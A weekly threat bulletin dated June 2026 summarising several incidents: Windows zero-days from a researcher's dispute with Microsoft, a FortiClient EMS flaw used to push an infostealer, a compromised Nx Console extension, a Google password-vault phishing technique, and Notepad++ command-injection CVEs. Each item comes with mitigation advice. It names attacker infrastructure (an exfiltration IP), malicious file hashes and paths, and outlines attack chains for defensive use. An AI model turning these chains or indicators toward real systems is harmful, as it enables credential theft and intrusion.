Weekly Threat Bulletin – June 3rd, 2026

Disgruntled 0-day Hunter 'Humiliated' by Microsoft Pledges 'Bone Shattering Drop' as Redmond Calls Cops

A dispute between Microsoft and a bug hunter known as Nightmare Eclipse (also Chaotic Eclipse) has intensified following the researcher's release of six Windows zero-day vulnerabilities: RedSun, UnDefend, BlueHammer, YellowKey, GreenPlasma, and MiniPlasma. Three of these—BlueHammer, RedSun, and UnDefend—were actively exploited shortly after Nightmare published proof-of-concept code on GitHub and GitLab. Microsoft responded with a blog post on uncoordinated vulnerability disclosure, asserting that none of the flaws were reported through official channels and threatening legal action via its Digital Crimes Unit, while also noting that YellowKey (CVE-2026-45585) is "more likely" to be exploited due to a public POC. Nightmare Eclipse claims Microsoft deleted their MSRC account, refused communication, and humiliated them, promising a "bone shattering drop" of further exploits on July 14. Experts, including systems engineer Muhammad Qasim Shahzad, noted the rapid weaponization of these flaws, causing significant enterprise-level damage and shrinking patching windows. Dustin Childs, an expert in coordinated vulnerability disclosure, suggested Microsoft could have managed the situation more effectively, while Katie Moussouris, who pioneered Microsoft's bug bounty program, criticized Microsoft's "mixed messages" and "vaguely threatening" tone, highlighting a "David and Goliath dynamic" where users ultimately suffer from failed coordination. Security researcher Kevin Beaumont characterized the situation as a "dumpster fire of Microsoft’s own making," pointing out past inconsistencies in Microsoft's approach to researchers who publicly disclose zero-days. The incident underscores ongoing challenges in coordinated vulnerability disclosure, with researchers frequently finding Microsoft difficult to work with, a problem expected to grow with the rise of AI-assisted bug discovery.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Prioritize and immediately deploy the security update that patches the actively exploited BlueHammer vulnerability (CVE-2026-33825) across all Windows endpoints and servers.
• Apply Microsoft's recommended mitigation for the YellowKey BitLocker bypass (CVE-2026-45585) by removing the `autofstx.exe` entry from the `BootExecute` registry value within the Windows Recovery Environment (WinRE) image on all affected Windows 11 and Server 2025 systems.
• Initiate a threat hunt across all endpoints for file-based indicators of compromise related to the RedSun and UnDefend vulnerabilities, specifically searching for `RedSun.exe` and `UnDefend.exe` in user directories and temporary folders.
• Configure your SIEM or monitoring tools to generate a high-priority alert when the Microsoft Defender Antivirus Service (`MsMpEng.exe`) fails to start, stops unexpectedly, or fails to load its engine, as this is a key indicator of the UnDefend vulnerability.
• Implement a detection rule in your EDR or SIEM to alert on the use of the Cloud Files API, specifically `CfRegisterSyncRoot` or `CfAbortHydration`, originating from processes that are not legitimate cloud sync clients like OneDrive or Dropbox.
• Schedule security operations staff to be on high alert on and immediately following July 14th, and prepare incident response playbooks for a potential widespread Windows zero-day event.

Compliance Best Practices

• Review and re-architect the entire vulnerability management program to reduce the mean time to patch for critical vulnerabilities, aiming for deployment within 72 hours of patch release instead of relying on a monthly cycle.
• Initiate a phased project to enforce the Principle of Least Privilege (PoLP) by removing local administrator rights from all standard user accounts and migrating to a just-in-time (JIT) access solution for administrative tasks.
• Update the corporate device configuration policy to mandate the use of multi-factor authentication for BitLocker, such as TPM+PIN, on all company laptops to mitigate physical access vulnerabilities.
• Establish and enforce a mandatory baseline configuration for all endpoint BIOS/UEFI settings, including enabling secure boot, setting a firmware password, and locking the boot order to prevent booting from unauthorized devices.
• Tune your Endpoint Detection and Response (EDR) platform to create behavioral analytics rules that alert on sequences of suspicious activity, such as a non-system process enumerating Volume Shadow Copies (VSS) followed by the creation of an NTFS junction point, which is indicative of LPE techniques.
• Conduct a tabletop exercise for the Incident Response team using a scenario involving a publicly disclosed, unpatched, and actively exploited vulnerability in a core enterprise application like Windows.

Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer

Threat actors are actively exploiting CVE-2026-35616, a critical pre-authentication API access bypass (CVSS 9.1) in FortiClient Endpoint Management Server (EMS), to deploy credential-stealing malware. This vulnerability, patched in FortiClient EMS 7.4.7 and later, allows attackers to gain privilege escalation and modify EMS configurations. Observed in May 2026, the campaign leverages the EMS's own management pathway to push malicious PowerShell commands to managed endpoints, disguised as legitimate operations. Attackers modify configurations to defer firmware upgrades and alter endpoint policies, inserting a script that uses the legitimate "fortitray.exe" to execute a .cmd file. This .cmd file, in turn, invokes a Base64-encoded PowerShell script to download and run `"FortiEndpoint_Patch.exe,"` an information stealer. This stealer, masquerading as an update, harvests sensitive data like passwords, cookies, and autofill details from Chromium- and Gecko-based browsers, saving them to a log file in the ProgramData directory. The PowerShell script then exfiltrates this captured data to the attacker-controlled IP address 83.138.53[.]110 via an HTTP POST request, potentially enabling further access to cloud services and internal applications by reusing stolen session cookies and credentials.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Immediately patch all FortiClient Endpoint Management Server (EMS) instances to version 7.4.7 or later to mitigate CVE-2026-35616.
• Block all outbound traffic to the IP address 83.138.53[.]110 at the network firewall to prevent data exfiltration.
• Use your Endpoint Detection and Response (EDR) tool or other endpoint search capabilities to scan all systems for the presence of the file "FortiEndpoint_Patch.exe".
• Query security information and event management (SIEM) and EDR logs for instances where the process `fortitray.exe` is the parent process of `cmd.exe`, which in turn launches `powershell.exe`.

Compliance Best Practices

• Implement enhanced PowerShell logging, including Script Block Logging and Module Logging, and forward these logs to your SIEM for analysis and alerting on suspicious activity.
• Develop and deploy an application allowlisting policy using a tool like Windows Defender Application Control or a third-party solution to prevent unauthorized executables from running on endpoints.
• Implement network segmentation to place critical infrastructure like the FortiClient EMS server into a secure management VLAN with strict firewall rules, limiting inbound access to only authorized administrative workstations.
• Implement a corporate policy and use Group Policy Objects (GPOs) to disable the password-saving feature in all company-supported web browsers to minimize the impact of credential theft malware.

CVE-2026-48027: Compromised Nx Console Version 18.95.0

CVE-2026-48027 details a critical supply chain compromise affecting Nx Console version 18.95.0, a VS Code extension (nrwl.angular-console), which was maliciously published on May 19, 2026. This compromised version was available for approximately 18 minutes on the Visual Studio Marketplace and 36 minutes on OpenVSX. Rated with a CVSS v3 score of 9.8, this vulnerability is actively exploited and listed in the CISA Known Exploited Vulnerabilities catalog. The malicious extension functions as a multi-stage credential stealer and supply chain poisoning tool, designed to harvest tokens and secrets from platforms such as GitHub, npm, AWS, HashiCorp Vault, Kubernetes, and 1Password, exfiltrating data via HTTPS, GitHub API, and DNS tunneling. It also establishes a persistent Python backdoor on macOS at `~/.local/share/kitty/cat.py`. Although the extension has over 2.2 million installations, internal analytics suggest thousands of users, potentially over 6,000, were affected, with GitHub reporting the exfiltration of approximately 3,800 internal source code repositories due to this compromise. Remediation requires upgrading to Nx Console version 18.100.0 or later and rotating all credentials accessible from any workstation that ran the compromised version. Specific indicators of compromise include the malicious VSIX SHA-256: `1A4AFCE34918BDC74AE3F31EDAFFFFAA0EE074D83618F53EDFD88137927340B8`, malicious `main.js` SHA-256: `B0CEFB66B953E5184B6ADB3035E9E267335AC5EABFE1848E07834777B9397B74`, obfuscated payload `index.js` SHA-256: `E7347D90653EFC565F03733A95E9209D78F9CFA81E31FF2B2DD9D48D75A4B8B1`, dropper `package.json` SHA-256: `43F2B001846C4966073EBFFA5BE8F15E491A1E7D32BBD805D57406FF540E0DD9`, and C2 Client `cat.py` SHA-256: `FB5C97557230A27460FDAB01FAFCFABEAA49590BAFD5B6EF30501AA9E0A51142`.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Scan all developer workstations to identify installations of the Nx Console Visual Studio Code extension, specifically version 18.95.0.
• For any machine with Nx Console version 18.95.0, immediately upgrade the extension to version 18.100.0 or a later, safe version.
• Use endpoint security tools to scan all developer workstations for files matching the SHA-256 hashes associated with CVE-2026-48027.
• On all macOS developer workstations, check for the existence of the file at the path `~/.local/share/kitty/cat.py`.
• For any user whose machine is identified as compromised, immediately revoke all active sessions and rotate their GitHub credentials, including personal access tokens.
• For any user whose machine is identified as compromised, immediately revoke and rotate their npm access tokens.
• For any user whose machine is identified as compromised, immediately disable and rotate all their AWS IAM user credentials and access keys.
• For any user whose machine is identified as compromised, immediately revoke their HashiCorp Vault tokens and credentials.
• For any user whose machine is identified as compromised, immediately revoke their Kubernetes access tokens and rotate any associated kubeconfig credentials.
• For any user whose machine is identified as compromised, immediately initiate a master password reset for their 1Password account and audit all stored credentials for unauthorized access or use.

Compliance Best Practices

• Develop and implement a policy to restrict the installation of Visual Studio Code extensions to a pre-approved allowlist managed by the security and development teams.
• Enhance network security monitoring to detect and alert on DNS tunneling activity from developer workstations.
• Implement and maintain strict egress filtering rules on the network perimeter to block outbound traffic from developer workstations to all but essential, allow-listed destinations.
• Deploy and configure an Endpoint Detection and Response (EDR) solution on all developer workstations to monitor for and block suspicious file creation, process execution, and network connections.
• Establish a recurring program to review and enforce the principle of least privilege for all developer accounts and service principals across critical systems, including GitHub, AWS, and Kubernetes.
• Implement a mandatory security awareness training program for all developers that specifically covers the risks of software supply chain attacks via IDE extensions, third-party libraries, and other development tools.

VaultJacking Attack Exposes Google Password Vaults via Single PIN

A newly identified phishing technique, "VaultJacking," demonstrates how a single compromised Google Password Manager (GPM) PIN can expose an entire user's credential vault, including passkeys. On Android devices, GPM relies on the device's screen lock (PIN, pattern, or password) for access, meaning that if an attacker bypasses this lock, they gain full access to all stored passwords and passkeys. While Google states that screen lock PINs are not stored by them and verification occurs in secure hardware enclaves with guess limits, the overall security of the password vault remains synonymous with the security of the associated Google Account. To mitigate this risk, users must enable strong Multi-Factor Authentication (MFA) for their Google Account, utilize a robust and unique Google Account password, and crucially, enable the Sync Passphrase to add an additional layer of encryption that prevents even Google from accessing password data. Furthermore, strengthening the device's screen lock and maintaining general device security are essential preventative measures.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Instruct all employees to immediately enable a strong, unique Sync Passphrase on their corporate Google Accounts to encrypt their synced data, including passwords.
• Audit all corporate Google Workspace accounts to ensure Multi-Factor Authentication (MFA) is enabled and enforced, prioritizing phishing-resistant methods like hardware security keys or authenticator apps.
• Enforce a policy requiring complex screen locks (e.g., long PINs or alphanumeric passwords instead of simple patterns) on all mobile devices with access to corporate data.
• Send a security bulletin to all employees explaining the 'VaultJacking' threat, and provide clear, step-by-step instructions on how to set a strong device screen lock and enable the Google Sync Passphrase.

Compliance Best Practices

• Implement a Mobile Device Management (MDM) or Unified Endpoint Management (UEM) solution to centrally enforce security policies, such as complex passcodes, encryption, and application controls on all mobile endpoints.
• Evaluate and standardize on an enterprise-grade password manager that is independent of the browser or operating system account and offers its own master password and multi-factor authentication.
• Develop a recurring security awareness training program that includes modules on mobile device security, phishing attack identification, and the importance of using unique credentials for different services.

Architectural Vulnerabilities in Notepad++: Arbitrary Code Execution Risks Unmasked

Multiple critical vulnerabilities have been identified in Notepad++, a widely used text editor, with one flaw enabling arbitrary code execution through native software features. A hotfix, Notepad++ 8.9.6.1, has been released to address three distinct vulnerabilities: CVE-2026-48770, CVE-2026-48778, and CVE-2026-48800. The most severe, CVE-2026-48778, carries a CVSS score of 7.8 and allows arbitrary code execution due to unsafe parsing of the `commandLineInterpreter` parameter within the `config.xml` file. This flaw, classified as CWE-78 (OS command injection), can be exploited when a user triggers the "Open Containing Folder in cmd" function, executing an attacker-controlled binary without prior sanitization. Exploitation vectors include overwriting `config.xml` in the local AppData directory, using malicious shortcuts with the `-settingsDir` parameter, cloud synchronization directory poisoning, and weaponized archives distributed via social engineering. This vulnerability requires no elevated privileges and has low exploitation complexity. Additionally, CVE-2026-48770 causes application instability and denial-of-service when processing malformed data, while CVE-2026-48800 permits separate code execution through flawed parsing of the `shortcuts.xml` document. Users are urged to update to Notepad++ 8.9.6.1 immediately, and administrators should monitor configuration adjustments and restrict write permissions on sensitive Windows directories.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Update all instances of Notepad++ to version 8.9.6.1 or newer on all company endpoints.
• Use asset inventory or endpoint detection and response (EDR) tools to generate a report of all systems with any version of Notepad++ installed.
• Using your SIEM or EDR, search for recent or anomalous modifications to `config.xml` and `shortcuts.xml` files located in Notepad++ AppData directories (e.g., `%APPDATA%\Notepad++`).
• Create a detection rule in your EDR to alert on Notepad++.exe launching any child process that is not a standard, expected command-line interpreter (e.g., cmd.exe, powershell.exe).
• Scan endpoints for shortcut files (.lnk) that launch Notepad++ with the `-settingsDir` command-line parameter pointing to an unusual or network-based directory.

Compliance Best Practices

• Implement an application control solution, such as Windows Defender Application Control or AppLocker, to prevent executables from running in user-writable locations like the AppData directory.
• Enforce a principle of least privilege by ensuring standard user accounts do not have administrative rights and cannot write to sensitive application or system directories.
• Establish a formal vulnerability management program that includes automated software inventory, risk-based prioritization, and defined service-level agreements (SLAs) for patching third-party applications.
• Develop and conduct regular security awareness training that educates employees on identifying and reporting social engineering attempts, particularly those involving suspicious file downloads or email attachments.
• Implement a File Integrity Monitoring (FIM) tool to create baselines and alert on unauthorized changes to critical configuration files for widely used applications.